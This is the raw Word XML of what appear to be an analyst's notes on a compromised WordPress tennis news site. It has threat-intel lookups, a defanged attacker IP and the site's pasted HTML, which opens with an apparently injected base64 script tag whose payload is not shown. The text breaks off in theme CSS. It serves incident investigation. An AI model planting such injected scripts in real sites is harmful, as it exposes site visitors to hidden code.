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977474" w14:textId="6C3C04A5" w:rsidR="00214067" w:rsidRDefault="00940393">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://twitter.com/MBThreatIntel/status/1439995792693944324</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78D4C961" w14:textId="4A9B975F" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="254D29F3" wp14:editId="511806E1">
            <wp:extent cx="5943600" cy="6525895"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1" name="Picture 1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, Teams&#10;&#10;Description automatically generated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2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AF9AB" w14:textId="665BF122" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="703E8016" w14:textId="24F832F6" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t>------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A98E30" w14:textId="23C081BC" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="2B3DC8EA" w14:textId="34F37115" w:rsidR="00940393" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00940393" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://community.riskiq.com/search/todosobretenis.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6DBE8F71" w14:textId="7A45FF81" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="6A67DFA3" w14:textId="5EC31994" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ABEBC9C" wp14:editId="0C25F562">
            <wp:extent cx="5943600" cy="2948305"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="10795"/>
            <wp:docPr id="2" name="Picture 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application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83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B928D1" w14:textId="4E869147" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="1B802E75" w14:textId="065D6929" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t>Domain has been around since 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4898023E" w14:textId="0A9ACEC8" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="6FFB825B" w14:textId="016D7F9A" w:rsidR="00940393" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00940393" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://community.riskiq.com/search/todosobretenis.com/hostpairs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E5F7F68" w14:textId="60C4DEE1" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="7BA756D2" w14:textId="62DBC2D6" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6346CC76" wp14:editId="60549A13">
            <wp:extent cx="5943600" cy="2607945"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="8255"/>
            <wp:docPr id="3" name="Picture 3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abl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79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CE7EFC" w14:textId="22D1626F" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="55BA053A" w14:textId="4C6793BE" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="332E4108" wp14:editId="42342106">
            <wp:extent cx="5943600" cy="3111500"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="12700"/>
            <wp:docPr id="4" name="Picture 4" descr="Graphical user interface, application, table, Exc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application, table, Excel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1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9BACAD" w14:textId="16CAE62F" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="00ED5326" w14:textId="165BA25C" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t>There is a script that is running from an IP address 91.228.155[.]148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5470711F" w14:textId="78B099F6" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="2A0F5B32" w14:textId="2DAD3F25" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t>Now let’s examine the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F18A01" w14:textId="6A5C3B9E" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="6F67F9AE" w14:textId="07F8A9D9" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t>--------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16699831" w14:textId="6998A27A" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="1F9E0873" w14:textId="7FE2616E" w:rsidR="00940393" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId11" w:anchor="summary" w:history="1">
        <w:r w:rsidR="00940393" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://urlscan.io/result/a9c6d374-6292-4300-bd66-6e072b72b372/#summary</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01FE425A" w14:textId="2AC0A469" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="3B7015E7" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="60BCA422" w14:textId="3FF191A8" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="316DA3B0" w14:textId="40A9D9C1" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D41D85F" wp14:editId="0F643FAA">
            <wp:extent cx="5943600" cy="3001010"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="8890"/>
            <wp:docPr id="5" name="Picture 5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1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138F1D" w14:textId="02223437" w:rsidR="00940393" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId13" w:anchor="transactions" w:history="1">
        <w:r w:rsidR="00940393" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://urlscan.io/result/a9c6d374-6292-4300-bd66-6e072b72b372/#transactions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="159B43D3" w14:textId="7539D707" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="46FB1876" w14:textId="29E64D72" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="0335DB72" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="25BA1195" w14:textId="0B4D2BD8" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C24009D" wp14:editId="3D7E4C96">
            <wp:extent cx="5943600" cy="3278505"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="10795"/>
            <wp:docPr id="6" name="Picture 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application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85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97AA6D" w14:textId="74F3F12A" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="4D77C02F" w14:textId="17F94A86" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t>Show the response of the primary request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ACACC7" w14:textId="686D2DAD" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="3F7E2874" w14:textId="39F60748" w:rsidR="00940393" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00940393" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://urlscan.io/responses/9142eddd4c17e8b05d9c7aedbd33fdf196496b6f72459a42ace9ae1b4fabdf4f/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14C11F00" w14:textId="2E821BD1" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="6B0D1486" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00940393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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940393">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD9537C" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00940393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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940393">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F64B128" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00940393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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940393">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;html lang="es-AR"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ED4823" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00940393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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940393">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF54341" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00940393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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940393">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;script src="data:text/javascript;base64,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</w:t>
      </w:r>
      <w:r w:rsidRPr="00940393">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3521D49A" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00940393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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940393">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;!-- Global site tag (gtag.js) - Google Analytics --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE5F66D" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00940393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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940393">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-77420967-1"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2BB5A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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E56DE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window.dataLayer = window.dataLayer || [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B669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function gtag(){dataLayer.push(arguments);}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEABBA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gtag('js', new Date());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612E9C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542E7E7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gtag('config', 'UA-77420967-1');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B5EB2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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0A134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0993414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&lt;meta charset="UTF-8" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713CCFA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&lt;meta name="viewport" id="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F752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rel="shortcut icon" href="http://todosobretenis.com/wp-content/uploads/2019/01/TST1.png" /&gt;&lt;link rel="pingback" href="http://todosobretenis.com/xmlrpc.php" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F14680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&lt;meta property="og:description" content="El circuito ATP pasa por acÃ¡" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE8FA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&lt;title&gt;Todo Sobre Tenis&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DA9A3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5D5BA3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&lt;!-- All In One SEO Pack 3.7.1[3755,3809] --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9665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&lt;meta name="description"  content="Las 24 horas, los 365 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del aÃ±o infÃ³rmate sobre el circuito ATP con Todo Sobre Tenis. Noticias, coberturas, entrevistas y en un solo lugar" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D2E23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203C386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type="application/ld+json" class="aioseop-schema"&gt;{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"http://todosobretenis.com/#organization","url":"http://todosobretenis.com/","name":"Todo Sobre Tenis","sameAs":[]},{"@type":"WebSite","@id":"http://todosobretenis.com/#website","url":"http://todosobretenis.com/","name":"Todo Sobre Tenis","publisher":{"@id":"http://todosobretenis.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"http://todosobretenis.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"http://todosobretenis.com#webpage","url":"http://todosobretenis.com","inLanguage":"es-AR","name":"Todo Sobre Tenis","isPartOf":{"@id":"http://todosobretenis.com/#website"},"breadcrumb":{"@id":"http://todosobretenis.com#breadcrumblist"},"description":"Las 24 horas, los 365 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del aÃ±o infÃ³rmate sobre el circuito ATP con Todo Sobre Tenis. Noticias, coberturas, entrevistas y en un solo lugar","datePublished":"2019-01-18T21:35:47+00:00","dateModified":"2020-01-20T15:27:17+00:00","about":{"@id":"http://todosobretenis.com/#organization"}},{"@type":"BreadcrumbList","@id":"http://todosobretenis.com#breadcrumblist","itemListElement":[{"@type":"ListItem","position":1,"item":{"@type":"WebPage","@id":"http://todosobretenis.com/","url":"http://todosobretenis.com/","name":"Todo Sobre Tenis"}}]}]}&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414BE57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rel="canonical" href="http://todosobretenis.com/" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AFB6B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&lt;!-- All In One SEO Pack --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0251B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rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3304D5C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rel='dns-prefetch' href='//s.w.org' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8940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rel="alternate" type="application/rss+xml" title="Todo Sobre Tenis &amp;raquo; Feed" href="http://todosobretenis.com/feed/" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8AC3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rel="alternate" type="application/rss+xml" title="Todo Sobre Tenis &amp;raquo; RSS de los comentarios" href="http://todosobretenis.com/comments/feed/" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557D649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&lt;script type="text/javascript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468A048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window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/todosobretenis.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.18"}};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DC5D9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!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&amp;&amp;i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r&lt;o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])?!1:!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55358,56760,9792,65039],[55358,56760,8203,9792,65039])}return!1}(o[r]),t.supports.everything=t.supports.everything&amp;&amp;t.supports[o[r]],"flag"!==o[r]&amp;&amp;(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&amp;&amp;t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&amp;&amp;!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&amp;&amp;t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&amp;&amp;n.twemoji&amp;&amp;(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFEA2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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ADCB8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&lt;style type="text/css"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306562D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img.wp-smiley,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8CB9E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img.emoji {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC5964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display: inline !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20242D0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  <w:t>border: none !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E0B87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box-shadow: none !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161193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height: 1em !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4C1A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width: 1em !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7193502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margin: 0 .07em !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B78000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vertical-align: -0.1em !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A4F3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none !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2422B24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padding: 0 !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E9C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B563A8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&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46110F2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rel='stylesheet' id='mvp-custom-style-css'  href='http://todosobretenis.com/wp-content/themes/zox-news/style.css?ver=4.9.18' type='text/css' media='all' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177F6CD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&lt;style id='mvp-custom-style-inline-css' type='text/css'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E80336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673FC29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1418F7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#mvp-wallpaper {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCC1E3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url() no-repeat 50% 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAF53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2A1519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06829DD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#mvp-foot-copy a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BED92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color: #0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4425929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7074CB8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4BB191E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p a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76370E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.mvp-post-add-main p a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39429D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box-shadow: inset 0 -4px 0 #0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB0DB4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5AD8C7E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497A8B1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p a:hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D37C4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.mvp-post-add-main p a:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F73C0D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#0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B957A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3F64D5A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1A65007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a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCFDA2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a:visited,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F0ECD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.post-info-name a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBB232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.woocommerce-breadcrumb a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123FDB8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color: #48ff00;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D637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531E87D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554F59D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#mvp-side-wrap a:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60357EA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color: #48ff00;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F49347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366FC5D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790519D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.mvp-fly-top:hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC9C4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.mvp-vid-box-wrap,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C332F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ul.mvp-soc-mob-list li.mvp-soc-mob-com {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C87274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#ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FA270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32B7404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B28F73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nav.mvp-fly-nav-menu ul li.menu-item-has-children:after,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA117F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.mvp-feat1-left-wrap span.mvp-cd-cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1821BC9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.mvp-widget-feat1-top-story span.mvp-cd-cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614CE6D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.mvp-widget-feat2-left-cont span.mvp-cd-cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4094D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.mvp-widget-dark-feat span.mvp-cd-cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B6BB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.mvp-widget-dark-sub span.mvp-cd-cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8094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.mvp-vid-wide-text span.mvp-cd-cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBD0D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.mvp-feat2-top-text span.mvp-cd-cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B79E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.mvp-feat3-main-story span.mvp-cd-cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50497B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.mvp-feat3-sub-text span.mvp-cd-cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1E803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.mvp-feat4-main-text span.mvp-cd-cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6329D90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.woocommerce-message:before,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5776F47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.woocommerce-info:before,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098CA7A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.woocommerce-message:before {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7407D31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color: #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3AAA2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449F1B1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26DF621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#searchform input,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C2647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.mvp-authors-name {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56961DB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border-bottom: 1px solid #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FE336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4E067B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69C017C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.mvp-fly-top:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095D624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border-top: 1px solid #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8ED7C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border-left: 1px solid #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F83B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border-bottom: 1px solid #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613E5D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5464D02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A9255B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.widget_price_filter .ui-slider .ui-slider-handle,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF166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#respond input#submit.alt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613AA3B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a.button.alt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A67AF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button.button.alt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC8426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input.button.alt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA7454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#respond input#submit.alt:hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F18831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a.button.alt:hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A68DC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button.button.alt:hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA0C8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input.button.alt:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1ED0B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background-color: #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C38B4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4668AE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8EB2E8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.woocommerce-error,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3163BA4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.woocommerce-info,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EEA84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.woocommerce-message {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B9E41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border-top-color: #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7000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4CCA46C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070AF2A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ul.mvp-feat1-list-buts li.active span.mvp-feat1-list-but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0CA64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span.mvp-widget-home-title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625393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span.mvp-post-cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B51B84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span.mvp-feat1-pop-head {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4916A2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#ff5900;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04726E1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34F673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6DCAF3F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span.onsale {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFE178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background-color: #ff5900;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D99D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3273F46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2573E9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.mvp-widget-feat2-side-more-but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC0D5E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.star-rating span:before,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DA65D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span.mvp-prev-next-label,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F80E28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.mvp-cat-date-wrap .sticky {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7F72E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color: #ff5900 !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6887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771D43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8AD2A8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>#mvp-main-nav-top,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6646949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#mvp-fly-wrap,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBEC96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.mvp-soc-mob-right,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E426EB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#mvp-main-nav-small-cont {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559ED9B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#ff8400;</w:t>
      </w:r>
    </w:p>
